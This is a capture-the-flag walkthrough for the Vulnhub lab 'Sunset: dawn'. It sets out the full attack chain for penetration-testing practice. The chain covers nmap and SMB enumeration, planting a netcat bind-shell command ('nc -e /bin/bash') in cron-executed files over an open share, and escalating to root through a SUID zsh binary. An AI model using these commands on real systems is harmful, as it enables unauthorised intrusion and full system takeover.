Today we are going to solve another CTF
challenge called “Sunset: dawn”. It is available on Vulnhub for the purpose of
Penetration Testing practices. This is a box from the Sunset series. The credit
for making this lab goes to “whitecr0wz”.
Let’s start and learn how to successfully breach it.
Level: Intermediate
Since these labs are available on the
Vulnhub Website. We will be downloading the lab file from this link.
Penetration Testing Methodology
Network Scanning
·
Netdiscover
·
Nmap
Enumeration
·
Browsing HTTP Service
·
Performing Directory Bruteforce
·
Enumerating log files
·
Enumerating SMB using
Enum4linux
Exploiting
·
Connecting via SMB
·
Sending files with netcat
invocation
Privilege Escalation
·
SUID bit on zsh
Capture the flag
Walkthrough
Network Scanning
We will be running this lab in a Virtual
Machine Player or Virtual Box. After
running the lab, we used the netdiscover command to check the IP Address of the
lab.
netdiscover
This was found out to be 192.168.1.165.
Now we will run an aggressive port scan
using nmap to gain the information about the open ports and the services
running on the target machine.
nmap -A 192.168.1.165
We learned from the scan that we have the
port 80 open which is hosting Apache httpd service, and we have the port 139,445,3306
open. This tells us that we have the NetBIOS and MySQL service running on the
target machine respectively.
Enumeration
Since we got the port 80 open, we decided
to browser the IP Address in the browser. We were given an unavailable error as
shown in the given image.
We also started a Directory Bruteforce in
order to enumerate the machine further. This gave us a directory called “logs”
as shown in the given image.
dirb http://192.168.1.165/
Upon finding the logs directory, we opened
the URL in our browser. This gave us a bunch of different log files like
auth.log, daemon.log, error.log and management.log. We tried to access the all those
log files but we got forbidden message in all except management.log.
So, we downloaded the management.log and
used cat command to open the management.log on our attacker machine (Kali
Linux). Here we see that we have a directory named “ITDEPT”. It contains two
files namely product-control and web-control. As these files were mentioned
with cron, we can safely say that these files are getting executed by some
background task.
cd Downloads
cat management.log
Back to the nmap port scan, we found that
the there is a NetBIOS SMB. Its time to enumerate this machine’s SMB Service. There
are multiple ways to do this about which you can learn from here.
Here we decided to use the Enum4Linux script. This shows that we have the
ITDEPT directory we found earlier. This means this directory is accessible
through SMB.
enum4linux -a 192.168.1.165
Also, as we explored the result of
Enum4Linux, we saw that we have two users namely, “dawn” and” ganimedes”.
Exploitation
Since, we found the ITDEPT directory in our
enumeration. We tried to access it using the SMB as shown in the image. We gave
a blank password to login. Upon logging in we ran the ls command. We found
nothing in it. We ran the ls command again with the -al parameters to see if we
missed any hidden files but we couldn’t find any.
smbclient //192.168.1.165/ITDEPT
ls
ls -al
But this doesn’t mean that we cannot create
any file in it. We went back to our terminal and created the files by the name
of “product-control” and “web-control”. We created the files by this name
because earlier while enumerating the management.log file we saw that files
with this name were executed after some time again and again using cron. We
also entered the netcat shell invocation script in those files using the echo
command as well.
echo “nc -e /bin/bash -lvp 1234 &”
> product-control
echo “nc -e /bin/bash -lvp 1234 &”
> web-control
ls
Now back to the SMB shell, we transferred
the files that we just created to the target system using put command. Both the
files were successfully transferred. After the transfer, we ran the ls command
to check whether the files were indeed on the system or not. As seen in the
image given below, we have put our files on the target system.
put product-control
put web-control
ls
Now, we went back to our browser, to see
the log directory. From there we downloaded the management.log file again. We
did this as if those files we just created were executed or not. As show in the
image, the files were successfully executed by the cron on the target system.
Now we ran the netcat to get this session
on the target machine. We get our shell through netcat. This was an improper
shell. So, we used the python one-liner to convert this into a proper shell. On
conversion we saw that the shell we got was of user dawn.
nc 192.168.1.165 1234
python -c ‘import
pty;pty.spawn(“/bin/bash”)’
Privilege Escalation
Now that we had a shell, it was regular
practice to check for any file having SUID permissions with the help of Find
command. By using the following command, we enumerated all binaries having SUID
permissions:
find / -perm -u=s -type f 2>/dev/null
whoami
/usr/bin/zsh
whoami
cd /root
ls
cat flag.txt
The Find command gave us that the zsh
command can help us escalate privilege on this machine. We ran the zsh command
and checked our status using the whoami command. We got root. Now it was time
to enumerate for the flag. We traversed into the root directory and found the
flag.txt file. This concludes this CTF.
0 comments:
Post a Comment